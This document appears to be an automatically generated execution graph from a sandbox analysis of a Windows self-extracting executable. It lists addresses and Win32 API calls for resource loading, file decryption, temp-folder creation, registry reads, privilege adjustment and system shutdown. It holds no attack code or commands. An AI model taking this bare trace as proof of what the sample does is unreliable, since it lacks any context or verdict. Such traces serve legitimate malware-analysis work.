                                                                                                                                                                                                        execution_graph 3128 bc69b0 3129 bc69b5 3128->3129 3137 bc6fbe GetModuleHandleW 3129->3137 3131 bc69c1 __set_app_type __p__fmode __p__commode 3132 bc69f9 3131->3132 3133 bc6a0e 3132->3133 3134 bc6a02 __setusermatherr 3132->3134 3139 bc71ef _controlfp 3133->3139 3134->3133 3136 bc6a13 3138 bc6fcf 3137->3138 3138->3131 3139->3136 3140 bc34f0 3141 bc3504 3140->3141 3142 bc35b8 3140->3142 3141->3142 3143 bc35be GetDesktopWindow 3141->3143 3144 bc351b 3141->3144 3145 bc3526 3142->3145 3146 bc3671 EndDialog 3142->3146 3162 bc43d0 6 API calls 3143->3162 3148 bc354f 3144->3148 3149 bc351f 3144->3149 3146->3145 3148->3145 3152 bc3559 ResetEvent 3148->3152 3149->3145 3151 bc352d TerminateThread EndDialog 3149->3151 3151->3145 3155 bc44b9 20 API calls 3152->3155 3153 bc361d SetWindowTextA CreateThread 3153->3145 3156 bc3646 3153->3156 3154 bc35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3154->3153 3157 bc3581 3155->3157 3159 bc44b9 20 API calls 3156->3159 3158 bc359b SetEvent 3157->3158 3160 bc358a SetEvent 3157->3160 3161 bc3680 4 API calls 3158->3161 3159->3142 3160->3145 3161->3142 3164 bc4463 SetWindowPos 3162->3164 3165 bc6ce0 4 API calls 3164->3165 3166 bc35d6 3165->3166 3166->3153 3166->3154 3167 bc6ef0 3168 bc6f2d 3167->3168 3170 bc6f02 3167->3170 3169 bc6f27 ?terminate@ 3169->3168 3170->3168 3170->3169 3171 bc7270 _except_handler4_common 3172 bc6bef _XcptFilter 2196 bc4ca0 GlobalAlloc 2197 bc6a60 2214 bc7155 2197->2214 2199 bc6a65 2200 bc6a76 GetStartupInfoW 2199->2200 2201 bc6a93 2200->2201 2202 bc6aa8 2201->2202 2203 bc6aaf Sleep 2201->2203 2204 bc6ac7 _amsg_exit 2202->2204 2207 bc6ad1 2202->2207 2203->2201 2204->2207 2205 bc6b2e __IsNonwritableInCurrentImage 2208 bc6bd6 _ismbblead 2205->2208 2209 bc6c1e 2205->2209 2213 bc6bbe exit 2205->2213 2219 bc2bfb GetVersion 2205->2219 2206 bc6b13 _initterm 2206->2205 2207->2205 2207->2206 2211 bc6af4 2207->2211 2208->2205 2210 bc6c27 _cexit 2209->2210 2209->2211 2210->2211 2213->2205 2215 bc717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2214->2215 2216 bc717a 2214->2216 2218 bc71cd 2215->2218 2216->2215 2217 bc71e2 2216->2217 2217->2199 2218->2217 2220 bc2c0f 2219->2220 2221 bc2c50 2219->2221 2220->2221 2223 bc2c13 GetModuleHandleW 2220->2223 2236 bc2caa memset memset memset 2221->2236 2223->2221 2225 bc2c22 GetProcAddress 2223->2225 2225->2221 2230 bc2c34 2225->2230 2226 bc2c8e 2227 bc2c9e 2226->2227 2228 bc2c97 CloseHandle 2226->2228 2227->2205 2228->2227 2230->2221 2234 bc2c89 2331 bc1f90 2234->2331 2348 bc468f FindResourceA SizeofResource 2236->2348 2239 bc2e30 2242 bc44b9 20 API calls 2239->2242 2240 bc2d2d CreateEventA SetEvent 2241 bc468f 7 API calls 2240->2241 2243 bc2d57 2241->2243 2244 bc2f06 2242->2244 2245 bc2d7d 2243->2245 2246 bc2d5b 2243->2246 2353 bc6ce0 2244->2353 2248 bc2e1f 2245->2248 2252 bc468f 7 API calls 2245->2252 2358 bc44b9 2246->2358 2387 bc5c9e 2248->2387 2250 bc2d6e 2250->2244 2255 bc2d9f 2252->2255 2253 bc2c62 2253->2226 2277 bc2f1d 2253->2277 2255->2246 2257 bc2da3 CreateMutexA 2255->2257 2256 bc2e3a 2258 bc2e52 FindResourceA 2256->2258 2259 bc2e43 2256->2259 2257->2248 2260 bc2dbd GetLastError 2257->2260 2263 bc2e6e 2258->2263 2264 bc2e64 LoadResource 2258->2264 2413 bc2390 2259->2413 2260->2248 2262 bc2dca 2260->2262 2265 bc2dea 2262->2265 2266 bc2dd5 2262->2266 2263->2250 2428 bc36ee GetVersionExA 2263->2428 2264->2263 2267 bc44b9 20 API calls 2265->2267 2268 bc44b9 20 API calls 2266->2268 2269 bc2dff 2267->2269 2271 bc2de8 2268->2271 2269->2248 2272 bc2e04 CloseHandle 2269->2272 2271->2272 2272->2244 2278 bc2f6c 2277->2278 2279 bc2f3f 2277->2279 2572 bc5164 2278->2572 2281 bc2f5f 2279->2281 2552 bc51e5 2279->2552 2705 bc3a3f 2281->2705 2283 bc2f71 2313 bc3041 2283->2313 2587 bc55a0 2283->2587 2289 bc6ce0 4 API calls 2290 bc2c6b 2289->2290 2318 bc52b6 2290->2318 2291 bc2f86 GetSystemDirectoryA 2292 bc658a CharPrevA 2291->2292 2293 bc2fab LoadLibraryA 2292->2293 2294 bc2ff7 FreeLibrary 2293->2294 2295 bc2fc0 GetProcAddress 2293->2295 2296 bc3006 2294->2296 2297 bc3017 SetCurrentDirectoryA 2294->2297 2295->2294 2298 bc2fd6 DecryptFileA 2295->2298 2296->2297 2637 bc621e GetWindowsDirectoryA 2296->2637 2299 bc3026 2297->2299 2301 bc3054 2297->2301 2298->2294 2305 bc2ff0 2298->2305 2304 bc44b9 20 API calls 2299->2304 2302 bc3061 2301->2302 2648 bc3b26 2301->2648 2307 bc307a 2302->2307 2302->2313 2657 bc256d 2302->2657 2309 bc3037 2304->2309 2305->2294 2311 bc3098 2307->2311 2668 bc3ba2 2307->2668 2724 bc6285 GetLastError 2309->2724 2311->2313 2315 bc30af 2311->2315 2313->2289 2726 bc4169 2315->2726 2319 bc52d6 2318->2319 2327 bc5316 2318->2327 2320 bc5300 LocalFree LocalFree 2319->2320 2322 bc52eb SetFileAttributesA DeleteFileA 2319->2322 2320->2319 2320->2327 2321 bc538c 2323 bc6ce0 4 API calls 2321->2323 2322->2320 2325 bc2c72 2323->2325 2325->2226 2325->2234 2326 bc535e SetCurrentDirectoryA 2329 bc2390 13 API calls 2326->2329 2327->2326 2328 bc65e8 4 API calls 2327->2328 2330 bc5374 2327->2330 2328->2326 2329->2330 2330->2321 3059 bc1fe1 2330->3059 2332 bc1f9a 2331->2332 2333 bc1f9f 2331->2333 2334 bc1ea7 15 API calls 2332->2334 2335 bc1fc0 2333->2335 2336 bc44b9 20 API calls 2333->2336 2339 bc1fd9 2333->2339 2334->2333 2337 bc1fcf ExitWindowsEx 2335->2337 2338 bc1ee2 GetCurrentProcess OpenProcessToken 2335->2338 2335->2339 2336->2335 2337->2339 2341 bc1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2338->2341 2343 bc1f0e 2338->2343 2339->2226 2342 bc1f6b ExitWindowsEx 2341->2342 2341->2343 2342->2343 2344 bc1f1f 2342->2344 2345 bc44b9 20 API calls 2343->2345 2346 bc6ce0 4 API calls 2344->2346 2345->2344 2347 bc1f8c 2346->2347 2347->2226 2349 bc46b6 2348->2349 2351 bc2d1a 2348->2351 2350 bc46be FindResourceA LoadResource LockResource 2349->2350 2349->2351 2350->2351 2352 bc46df memcpy_s FreeResource 2350->2352 2351->2239 2351->2240 2352->2351 2354 bc6ce8 2353->2354 2355 bc6ceb 2353->2355 2354->2253 2470 bc6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2355->2470 2357 bc6e26 2357->2253 2359 bc44fe LoadStringA 2358->2359 2360 bc455a 2358->2360 2361 bc4527 2359->2361 2362 bc4562 2359->2362 2363 bc6ce0 4 API calls 2360->2363 2471 bc681f 2361->2471 2367 bc45c9 2362->2367 2374 bc457e 2362->2374 2365 bc4689 2363->2365 2365->2250 2371 bc45cd LocalAlloc 2367->2371 2372 bc4607 LocalAlloc 2367->2372 2368 bc4536 MessageBoxA 2368->2360 2371->2360 2375 bc45f3 2371->2375 2372->2360 2381 bc45c4 2372->2381 2374->2374 2377 bc4596 LocalAlloc 2374->2377 2378 bc171e _vsnprintf 2375->2378 2376 bc462d MessageBeep 2379 bc681f 10 API calls 2376->2379 2377->2360 2380 bc45af 2377->2380 2378->2381 2382 bc463b 2379->2382 2488 bc171e 2380->2488 2381->2376 2384 bc4645 MessageBoxA LocalFree 2382->2384 2385 bc67c9 EnumResourceLanguagesA 2382->2385 2384->2360 2385->2384 2392 bc5e17 2387->2392 2396 bc5cc3 2387->2396 2388 bc6ce0 4 API calls 2390 bc2e2c 2388->2390 2389 bc5ced CharNextA 2389->2396 2390->2239 2390->2256 2391 bc5dec GetModuleFileNameA 2391->2392 2393 bc5e0a 2391->2393 2392->2388 2498 bc66c8 2393->2498 2395 bc6218 2507 bc6e2a 2395->2507 2396->2389 2396->2392 2396->2395 2399 bc5e36 CharUpperA 2396->2399 2405 bc5dd0 2396->2405 2406 bc5f9f CharUpperA 2396->2406 2407 bc5f59 CompareStringA 2396->2407 2408 bc6003 CharUpperA 2396->2408 2409 bc60a2 CharUpperA 2396->2409 2410 bc5edc CharUpperA 2396->2410 2411 bc667f IsDBCSLeadByte CharNextA 2396->2411 2503 bc658a 2396->2503 2399->2396 2400 bc61d0 2399->2400 2401 bc44b9 20 API calls 2400->2401 2402 bc61e7 2401->2402 2403 bc61f7 ExitProcess 2402->2403 2404 bc61f0 CloseHandle 2402->2404 2404->2403 2405->2391 2405->2392 2406->2396 2407->2396 2408->2396 2409->2396 2410->2396 2411->2396 2414 bc24cb 2413->2414 2417 bc23b9 2413->2417 2415 bc6ce0 4 API calls 2414->2415 2416 bc24dc 2415->2416 2416->2250 2417->2414 2418 bc23e9 FindFirstFileA 2417->2418 2418->2414 2426 bc2407 2418->2426 2419 bc2479 2423 bc2488 SetFileAttributesA DeleteFileA 2419->2423 2420 bc2421 lstrcmpA 2421 bc24a9 FindNextFileA 2420->2421 2422 bc2431 lstrcmpA 2420->2422 2424 bc24bd FindClose RemoveDirectoryA 2421->2424 2421->2426 2422->2421 2422->2426 2423->2421 2424->2414 2425 bc658a CharPrevA 2425->2426 2426->2419 2426->2420 2426->2421 2426->2425 2427 bc2390 5 API calls 2426->2427 2427->2426 2433 bc3737 2428->2433 2435 bc372d 2428->2435 2429 bc44b9 20 API calls 2430 bc39fc 2429->2430 2431 bc6ce0 4 API calls 2430->2431 2432 bc2e92 2431->2432 2432->2244 2432->2250 2443 bc18a3 2432->2443 2433->2430 2433->2435 2436 bc38a4 2433->2436 2514 bc28e8 2433->2514 2435->2429 2435->2430 2436->2430 2436->2435 2437 bc39c1 MessageBeep 2436->2437 2438 bc681f 10 API calls 2437->2438 2439 bc39ce 2438->2439 2440 bc39d8 MessageBoxA 2439->2440 2442 bc67c9 EnumResourceLanguagesA 2439->2442 2440->2430 2442->2440 2444 bc18d5 2443->2444 2449 bc19b8 2443->2449 2543 bc17ee LoadLibraryA 2444->2543 2446 bc6ce0 4 API calls 2448 bc19d5 2446->2448 2448->2250 2463 bc6517 FindResourceA 2448->2463 2449->2446 2450 bc18e5 GetCurrentProcess OpenProcessToken 2450->2449 2451 bc1900 GetTokenInformation 2450->2451 2452 bc1918 GetLastError 2451->2452 2453 bc19aa CloseHandle 2451->2453 2452->2453 2454 bc1927 LocalAlloc 2452->2454 2453->2449 2455 bc1938 GetTokenInformation 2454->2455 2456 bc19a9 2454->2456 2457 bc194e AllocateAndInitializeSid 2455->2457 2458 bc19a2 LocalFree 2455->2458 2456->2453 2457->2458 2460 bc196e 2457->2460 2458->2456 2459 bc1999 FreeSid 2459->2458 2460->2459 2461 bc1975 EqualSid 2460->2461 2462 bc198c 2460->2462 2461->2460 2461->2462 2462->2459 2464 bc656b 2463->2464 2465 bc6536 LoadResource 2463->2465 2467 bc44b9 20 API calls 2464->2467 2465->2464 2466 bc6544 DialogBoxIndirectParamA FreeResource 2465->2466 2466->2464 2468 bc657c 2466->2468 2467->2468 2468->2250 2470->2357 2472 bc6857 GetVersionExA 2471->2472 2481 bc691a 2471->2481 2474 bc687c 2472->2474 2472->2481 2473 bc6ce0 4 API calls 2475 bc452c 2473->2475 2476 bc68a5 GetSystemMetrics 2474->2476 2474->2481 2475->2368 2482 bc67c9 2475->2482 2477 bc68b5 RegOpenKeyExA 2476->2477 2476->2481 2478 bc68d6 RegQueryValueExA RegCloseKey 2477->2478 2477->2481 2479 bc690c 2478->2479 2478->2481 2492 bc66f9 2479->2492 2481->2473 2483 bc67e2 2482->2483 2487 bc6803 2482->2487 2496 bc6793 EnumResourceLanguagesA 2483->2496 2485 bc67f5 2485->2487 2497 bc6793 EnumResourceLanguagesA 2485->2497 2487->2368 2489 bc172d 2488->2489 2490 bc173d _vsnprintf 2489->2490 2491 bc175d 2489->2491 2490->2491 2491->2381 2493 bc670f 2492->2493 2494 bc6740 CharNextA 2493->2494 2495 bc674b 2493->2495 2494->2493 2495->2481 2496->2485 2497->2487 2501 bc66d5 2498->2501 2499 bc66f3 2499->2392 2501->2499 2502 bc66e5 CharNextA 2501->2502 2510 bc6648 2501->2510 2502->2501 2504 bc659b 2503->2504 2505 bc65b8 CharPrevA 2504->2505 2506 bc65ab 2504->2506 2505->2506 2506->2396 2513 bc6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2507->2513 2509 bc621d 2511 bc665d IsDBCSLeadByte 2510->2511 2512 bc6668 2510->2512 2511->2512 2512->2501 2513->2509 2515 bc2a62 2514->2515 2522 bc290d 2514->2522 2517 bc2a6e GlobalFree 2515->2517 2518 bc2a75 2515->2518 2517->2518 2518->2436 2519 bc2955 GlobalAlloc 2519->2515 2520 bc2968 GlobalLock 2519->2520 2520->2515 2520->2522 2521 bc2a20 GlobalUnlock 2521->2522 2522->2515 2522->2519 2522->2521 2523 bc2a80 GlobalUnlock 2522->2523 2524 bc2773 2522->2524 2523->2515 2525 bc28b2 2524->2525 2526 bc27a3 CharUpperA CharNextA CharNextA 2524->2526 2527 bc28b7 GetSystemDirectoryA 2525->2527 2526->2527 2528 bc27db 2526->2528 2529 bc28bf 2527->2529 2530 bc28a8 GetWindowsDirectoryA 2528->2530 2531 bc27e3 2528->2531 2532 bc28d2 2529->2532 2533 bc658a CharPrevA 2529->2533 2530->2529 2535 bc658a CharPrevA 2531->2535 2534 bc6ce0 4 API calls 2532->2534 2533->2532 2536 bc28e2 2534->2536 2537 bc2810 RegOpenKeyExA 2535->2537 2536->2522 2537->2529 2538 bc2837 RegQueryValueExA 2537->2538 2539 bc285c 2538->2539 2540 bc289a RegCloseKey 2538->2540 2541 bc2867 ExpandEnvironmentStringsA 2539->2541 2542 bc287a 2539->2542 2540->2529 2541->2542 2542->2540 2544 bc1826 GetProcAddress 2543->2544 2545 bc1890 2543->2545 2547 bc1889 FreeLibrary 2544->2547 2548 bc1839 AllocateAndInitializeSid 2544->2548 2546 bc6ce0 4 API calls 2545->2546 2549 bc189f 2546->2549 2547->2545 2548->2547 2550 bc185f FreeSid 2548->2550 2549->2449 2549->2450 2550->2547 2553 bc468f 7 API calls 2552->2553 2554 bc51f9 LocalAlloc 2553->2554 2555 bc522d 2554->2555 2556 bc520d 2554->2556 2558 bc468f 7 API calls 2555->2558 2557 bc44b9 20 API calls 2556->2557 2559 bc521e 2557->2559 2560 bc523a 2558->2560 2561 bc6285 GetLastError 2559->2561 2562 bc523e 2560->2562 2563 bc5262 lstrcmpA 2560->2563 2571 bc5223 2561->2571 2564 bc44b9 20 API calls 2562->2564 2565 bc527e 2563->2565 2566 bc5272 LocalFree 2563->2566 2569 bc524f LocalFree 2564->2569 2567 bc44b9 20 API calls 2565->2567 2568 bc2f4d 2566->2568 2570 bc5290 LocalFree 2567->2570 2568->2278 2568->2281 2568->2313 2569->2568 2570->2571 2571->2568 2573 bc468f 7 API calls 2572->2573 2574 bc5175 2573->2574 2575 bc517a 2574->2575 2576 bc51af 2574->2576 2577 bc44b9 20 API calls 2575->2577 2578 bc468f 7 API calls 2576->2578 2579 bc518d 2577->2579 2580 bc51c0 2578->2580 2579->2283 2739 bc6298 2580->2739 2584 bc51ce 2586 bc44b9 20 API calls 2584->2586 2585 bc51e1 2585->2283 2586->2579 2588 bc468f 7 API calls 2587->2588 2589 bc55c7 LocalAlloc 2588->2589 2590 bc55fd 2589->2590 2591 bc55db 2589->2591 2593 bc468f 7 API calls 2590->2593 2592 bc44b9 20 API calls 2591->2592 2594 bc55ec 2592->2594 2595 bc560a 2593->2595 2598 bc6285 GetLastError 2594->2598 2596 bc560e 2595->2596 2597 bc5632 lstrcmpA 2595->2597 2599 bc44b9 20 API calls 2596->2599 2600 bc564b LocalFree 2597->2600 2601 bc5645 2597->2601 2623 bc55f1 2598->2623 2602 bc561f LocalFree 2599->2602 2603 bc565b 2600->2603 2604 bc5696 2600->2604 2601->2600 2605 bc55f6 2602->2605 2612 bc5467 49 API calls 2603->2612 2606 bc589f 2604->2606 2607 bc56ae GetTempPathA 2604->2607 2609 bc6ce0 4 API calls 2605->2609 2608 bc6517 24 API calls 2606->2608 2611 bc56c3 2607->2611 2617 bc56eb 2607->2617 2608->2605 2610 bc2f7e 2609->2610 2610->2291 2610->2313 2751 bc5467 2611->2751 2614 bc5678 2612->2614 2614->2605 2616 bc5680 2614->2616 2618 bc44b9 20 API calls 2616->2618 2617->2605 2619 bc586c GetWindowsDirectoryA 2617->2619 2620 bc5717 GetDriveTypeA 2617->2620 2618->2623 2785 bc597d GetCurrentDirectoryA SetCurrentDirectoryA 2619->2785 2624 bc5730 GetFileAttributesA 2620->2624 2635 bc572b 2620->2635 2623->2605 2624->2635 2626 bc5467 49 API calls 2626->2617 2627 bc2630 21 API calls 2627->2635 2629 bc57c1 GetWindowsDirectoryA 2629->2635 2630 bc597d 34 API calls 2630->2635 2631 bc658a CharPrevA 2632 bc57e8 GetFileAttributesA 2631->2632 2633 bc57fa CreateDirectoryA 2632->2633 2632->2635 2633->2635 2634 bc5827 SetFileAttributesA 2634->2635 2635->2605 2635->2619 2635->2620 2635->2624 2635->2627 2635->2629 2635->2630 2635->2631 2635->2634 2636 bc5467 49 API calls 2635->2636 2781 bc6952 2635->2781 2636->2635 2638 bc6268 2637->2638 2639 bc6249 2637->2639 2641 bc597d 34 API calls 2638->2641 2640 bc44b9 20 API calls 2639->2640 2642 bc625a 2640->2642 2643 bc6277 2641->2643 2644 bc6285 GetLastError 2642->2644 2645 bc6ce0 4 API calls 2643->2645 2646 bc625f 2644->2646 2647 bc3013 2645->2647 2646->2643 2647->2297 2647->2313 2649 bc3b2d 2648->2649 2649->2649 2650 bc3b72 2649->2650 2651 bc3b53 2649->2651 2852 bc4fe0 2650->2852 2653 bc6517 24 API calls 2651->2653 2654 bc3b70 2653->2654 2655 bc6298 10 API calls 2654->2655 2656 bc3b7b 2654->2656 2655->2656 2656->2302 2658 bc2622 2657->2658 2659 bc2583 2657->2659 2906 bc24e0 GetWindowsDirectoryA 2658->2906 2661 bc25e8 RegOpenKeyExA 2659->2661 2662 bc258b 2659->2662 2663 bc2609 RegQueryInfoKeyA 2661->2663 2664 bc25e3 2661->2664 2662->2664 2666 bc259b RegOpenKeyExA 2662->2666 2665 bc25d1 RegCloseKey 2663->2665 2664->2307 2665->2664 2666->2664 2667 bc25bc RegQueryValueExA 2666->2667 2667->2665 2669 bc3bdb 2668->2669 2682 bc3bec 2668->2682 2670 bc468f 7 API calls 2669->2670 2670->2682 2671 bc3c03 memset 2671->2682 2672 bc3d13 2673 bc44b9 20 API calls 2672->2673 2701 bc3d26 2673->2701 2675 bc3f4d 2677 bc6ce0 4 API calls 2675->2677 2676 bc468f 7 API calls 2676->2682 2678 bc3f60 2677->2678 2678->2311 2679 bc3d7b CompareStringA 2679->2682 2689 bc3fd7 2679->2689 2681 bc3fab 2684 bc44b9 20 API calls 2681->2684 2682->2671 2682->2672 2682->2675 2682->2676 2682->2679 2682->2681 2685 bc3f1e LocalFree 2682->2685 2686 bc3f46 LocalFree 2682->2686 2682->2689 2691 bc3cc7 CompareStringA 2682->2691 2702 bc3e10 2682->2702 2914 bc1ae8 2682->2914 2954 bc202a memset memset RegCreateKeyExA 2682->2954 2980 bc3fef 2682->2980 2688 bc3fbe LocalFree 2684->2688 2685->2682 2685->2689 2686->2675 2688->2675 2689->2675 3004 bc2267 2689->3004 2691->2682 2692 bc3e1f GetProcAddress 2694 bc3f64 2692->2694 2692->2702 2693 bc3f92 2695 bc44b9 20 API calls 2693->2695 2697 bc44b9 20 API calls 2694->2697 2696 bc3fa9 2695->2696 2698 bc3f7c LocalFree 2696->2698 2699 bc3f75 FreeLibrary 2697->2699 2700 bc6285 GetLastError 2698->2700 2699->2698 2700->2701 2701->2675 2702->2692 2702->2693 2703 bc3eff FreeLibrary 2702->2703 2704 bc3f40 FreeLibrary 2702->2704 2994 bc6495 2702->2994 2703->2685 2704->2686 2706 bc468f 7 API calls 2705->2706 2707 bc3a55 LocalAlloc 2706->2707 2708 bc3a6c 2707->2708 2709 bc3a8e 2707->2709 2711 bc44b9 20 API calls 2708->2711 2710 bc468f 7 API calls 2709->2710 2712 bc3a98 2710->2712 2713 bc3a7d 2711->2713 2714 bc3a9c 2712->2714 2715 bc3ac5 lstrcmpA 2712->2715 2716 bc6285 GetLastError 2713->2716 2717 bc44b9 20 API calls 2714->2717 2718 bc3b0d LocalFree 2715->2718 2719 bc3ada 2715->2719 2722 bc2f64 2716->2722 2720 bc3aad LocalFree 2717->2720 2718->2722 2721 bc6517 24 API calls 2719->2721 2720->2722 2723 bc3aec LocalFree 2721->2723 2722->2278 2722->2313 2723->2722 2725 bc303c 2724->2725 2725->2313 2727 bc468f 7 API calls 2726->2727 2728 bc417d LocalAlloc 2727->2728 2729 bc41a8 2728->2729 2730 bc4195 2728->2730 2732 bc468f 7 API calls 2729->2732 2731 bc44b9 20 API calls 2730->2731 2734 bc41a6 2731->2734 2733 bc41b5 2732->2733 2735 bc41b9 2733->2735 2736 bc41c5 lstrcmpA 2733->2736 2734->2313 2738 bc44b9 20 API calls 2735->2738 2736->2735 2737 bc41e6 LocalFree 2736->2737 2737->2734 2738->2737 2740 bc171e _vsnprintf 2739->2740 2741 bc62c9 FindResourceA 2740->2741 2743 bc62cb LoadResource LockResource 2741->2743 2744 bc6353 2741->2744 2743->2744 2747 bc62e0 2743->2747 2745 bc6ce0 4 API calls 2744->2745 2746 bc51ca 2745->2746 2746->2584 2746->2585 2748 bc631b FreeResource 2747->2748 2749 bc6355 FreeResource 2747->2749 2750 bc171e _vsnprintf 2748->2750 2749->2744 2750->2741 2752 bc548a 2751->2752 2771 bc551a 2751->2771 2812 bc53a1 2752->2812 2754 bc5581 2758 bc6ce0 4 API calls 2754->2758 2757 bc5495 2757->2754 2763 bc550c 2757->2763 2764 bc54c2 GetSystemInfo 2757->2764 2765 bc559a 2758->2765 2759 bc554d 2759->2754 2766 bc597d 34 API calls 2759->2766 2760 bc553b CreateDirectoryA 2761 bc5577 2760->2761 2762 bc5547 2760->2762 2767 bc6285 GetLastError 2761->2767 2762->2759 2768 bc658a CharPrevA 2763->2768 2769 bc54da 2764->2769 2765->2605 2775 bc2630 GetWindowsDirectoryA 2765->2775 2772 bc555c 2766->2772 2770 bc557c 2767->2770 2768->2771 2769->2763 2773 bc658a CharPrevA 2769->2773 2770->2754 2823 bc58c8 2771->2823 2772->2754 2774 bc5568 RemoveDirectoryA 2772->2774 2773->2763 2774->2754 2776 bc265e 2775->2776 2777 bc266f 2775->2777 2778 bc44b9 20 API calls 2776->2778 2779 bc6ce0 4 API calls 2777->2779 2778->2777 2780 bc2687 2779->2780 2780->2617 2780->2626 2782 bc696e GetDiskFreeSpaceA 2781->2782 2783 bc69a1 2781->2783 2782->2783 2784 bc6989 MulDiv 2782->2784 2783->2635 2784->2783 2786 bc59dd GetDiskFreeSpaceA 2785->2786 2787 bc59bb 2785->2787 2788 bc5ba1 memset 2786->2788 2789 bc5a21 MulDiv 2786->2789 2790 bc44b9 20 API calls 2787->2790 2791 bc6285 GetLastError 2788->2791 2789->2788 2792 bc5a50 GetVolumeInformationA 2789->2792 2793 bc59cc 2790->2793 2794 bc5bbc GetLastError FormatMessageA 2791->2794 2795 bc5a6e memset 2792->2795 2796 bc5ab5 SetCurrentDirectoryA 2792->2796 2797 bc6285 GetLastError 2793->2797 2798 bc5be3 2794->2798 2799 bc6285 GetLastError 2795->2799 2806 bc5acc 2796->2806 2809 bc59d1 2797->2809 2801 bc44b9 20 API calls 2798->2801 2802 bc5a89 GetLastError FormatMessageA 2799->2802 2800 bc5b94 2804 bc6ce0 4 API calls 2800->2804 2803 bc5bf5 SetCurrentDirectoryA 2801->2803 2802->2798 2803->2800 2805 bc5c11 2804->2805 2805->2617 2807 bc5b0a 2806->2807 2810 bc5b20 2806->2810 2808 bc44b9 20 API calls 2807->2808 2808->2809 2809->2800 2810->2800 2835 bc268b 2810->2835 2814 bc53bf 2812->2814 2813 bc171e _vsnprintf 2813->2814 2814->2813 2815 bc658a CharPrevA 2814->2815 2819 bc5415 GetTempFileNameA 2814->2819 2816 bc53fa RemoveDirectoryA GetFileAttributesA 2815->2816 2816->2814 2817 bc544f CreateDirectoryA 2816->2817 2818 bc543a 2817->2818 2817->2819 2821 bc6ce0 4 API calls 2818->2821 2819->2818 2820 bc5429 DeleteFileA CreateDirectoryA 2819->2820 2820->2818 2822 bc5449 2821->2822 2822->2757 2824 bc58d8 2823->2824 2824->2824 2825 bc58df LocalAlloc 2824->2825 2826 bc58f3 2825->2826 2828 bc5919 2825->2828 2827 bc44b9 20 API calls 2826->2827 2829 bc5906 2827->2829 2831 bc658a CharPrevA 2828->2831 2830 bc6285 GetLastError 2829->2830 2832 bc5534 2829->2832 2830->2832 2833 bc5931 CreateFileA LocalFree 2831->2833 2832->2759 2832->2760 2833->2829 2834 bc595b CloseHandle GetFileAttributesA 2833->2834 2834->2829 2836 bc26b9 2835->2836 2837 bc26e5 2835->2837 2838 bc171e _vsnprintf 2836->2838 2839 bc26ea 2837->2839 2843 bc271f 2837->2843 2840 bc26cc 2838->2840 2841 bc171e _vsnprintf 2839->2841 2844 bc44b9 20 API calls 2840->2844 2846 bc26fd 2841->2846 2842 bc26e3 2845 bc6ce0 4 API calls 2842->2845 2843->2842 2847 bc171e _vsnprintf 2843->2847 2844->2842 2848 bc276d 2845->2848 2849 bc44b9 20 API calls 2846->2849 2850 bc2735 2847->2850 2848->2800 2849->2842 2851 bc44b9 20 API calls 2850->2851 2851->2842 2853 bc468f 7 API calls 2852->2853 2854 bc4ff5 FindResourceA LoadResource LockResource 2853->2854 2855 bc5020 2854->2855 2869 bc515f 2854->2869 2856 bc5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2855->2856 2857 bc5057 2855->2857 2856->2857 2874 bc4efd 2857->2874 2860 bc507c 2864 bc50e8 2860->2864 2871 bc5106 2860->2871 2861 bc5060 2862 bc44b9 20 API calls 2861->2862 2863 bc5075 2862->2863 2863->2871 2865 bc44b9 20 API calls 2864->2865 2865->2863 2866 bc511d 2868 bc5129 2866->2868 2870 bc513a 2866->2870 2867 bc5110 FreeResource 2867->2866 2872 bc44b9 20 API calls 2868->2872 2869->2654 2870->2869 2873 bc514c SendMessageA 2870->2873 2871->2866 2871->2867 2872->2870 2873->2869 2875 bc4f4a 2874->2875 2881 bc4fa1 2875->2881 2882 bc4980 2875->2882 2877 bc6ce0 4 API calls 2878 bc4fc6 2877->2878 2878->2860 2878->2861 2881->2877 2883 bc4990 2882->2883 2884 bc49a5 2883->2884 2885 bc49c2 lstrcmpA 2883->2885 2886 bc44b9 20 API calls 2884->2886 2887 bc4a0e 2885->2887 2888 bc49ba 2885->2888 2886->2888 2887->2888 2893 bc487a 2887->2893 2888->2881 2890 bc4b60 2888->2890 2891 bc4b76 2890->2891 2892 bc4b92 FindCloseChangeNotification 2890->2892 2891->2881 2892->2891 2894 bc48a2 CreateFileA 2893->2894 2896 bc4908 2894->2896 2897 bc48e9 2894->2897 2896->2888 2897->2896 2898 bc48ee 2897->2898 2901 bc490c 2898->2901 2902 bc48f5 CreateFileA 2901->2902 2903 bc4917 2901->2903 2902->2896 2903->2902 2904 bc4962 CharNextA 2903->2904 2905 bc4953 CreateDirectoryA 2903->2905 2904->2903 2905->2904 2907 bc255b 2906->2907 2908 bc2510 2906->2908 2910 bc6ce0 4 API calls 2907->2910 2909 bc658a CharPrevA 2908->2909 2911 bc2522 WritePrivateProfileStringA _lopen 2909->2911 2912 bc2569 2910->2912 2911->2907 2913 bc2548 _llseek _lclose 2911->2913 2912->2664 2913->2907 2915 bc1b25 2914->2915 3018 bc1a84 2915->3018 2917 bc1b57 2918 bc658a CharPrevA 2917->2918 2920 bc1b8c 2917->2920 2918->2920 2919 bc66c8 2 API calls 2921 bc1bd1 2919->2921 2920->2919 2922 bc1bd9 CompareStringA 2921->2922 2923 bc1d73 2921->2923 2922->2923 2924 bc1bf7 GetFileAttributesA 2922->2924 2925 bc66c8 2 API calls 2923->2925 2926 bc1c0d 2924->2926 2927 bc1d53 2924->2927 2928 bc1d7d 2925->2928 2926->2927 2933 bc1a84 2 API calls 2926->2933 2931 bc44b9 20 API calls 2927->2931 2929 bc1df8 LocalAlloc 2928->2929 2930 bc1d81 CompareStringA 2928->2930 2929->2927 2932 bc1e0b GetFileAttributesA 2929->2932 2930->2929 2937 bc1d9b 2930->2937 2951 bc1cc2 2931->2951 2945 bc1e1d 2932->2945 2952 bc1e45 2932->2952 2934 bc1c31 2933->2934 2935 bc1c50 LocalAlloc 2934->2935 2940 bc1a84 2 API calls 2934->2940 2935->2927 2938 bc1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2935->2938 2936 bc1e89 2939 bc6ce0 4 API calls 2936->2939 2937->2937 2941 bc1dbe LocalAlloc 2937->2941 2947 bc1cf8 2938->2947 